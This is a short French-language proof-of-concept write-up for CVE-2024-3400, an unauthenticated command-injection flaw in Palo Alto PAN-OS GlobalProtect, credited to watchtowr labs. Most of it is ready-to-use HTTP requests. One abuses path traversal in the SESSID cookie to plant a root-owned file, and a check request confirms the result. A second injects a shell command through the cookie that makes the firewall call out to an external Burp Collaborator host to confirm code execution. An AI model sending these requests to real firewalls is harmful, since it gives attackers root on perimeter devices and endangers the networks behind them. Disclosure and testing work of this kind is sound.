
CVE-2024-3400 PAN-OS : Vulnérabilité d'injection de commandes OS dans GlobalProtect
CVE-2024-3400 Injection de commande OS Palo Alto
Description du fournisseur
Une vulnérabilité d'injection de commande dans la fonctionnalité GlobalProtect du logiciel PAN-OS de Palo Alto Networks pour certaines versions de PAN-OS et configurations de fonctionnalités distinctes peut permettre à un attaquant non authentifié d'exécuter du code arbitraire avec les privilèges root sur le pare-feu.
Merci à watchtowr labs 🚀
Requête HTTP :
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
poc.txt devrait être créé sous ce chemin /var/appweb/sslvpndocs/global-protect/portal/images/poc.tx avec les privilèges root.
Si vulnérable, vous recevrez une erreur 403 lorsque vous accéderez à poc.txt au lieu d'une 404.
GET /global-protect/portal/images/poc.txt HTTP/1.1
Host: 127.0.0.1
Connection: close
La télémétrie doit être activée.
Vous pouvez utiliser Burp Collaborator pour vérifier l'RCE
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`hostname${IFS}burpcollaborator.net `;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0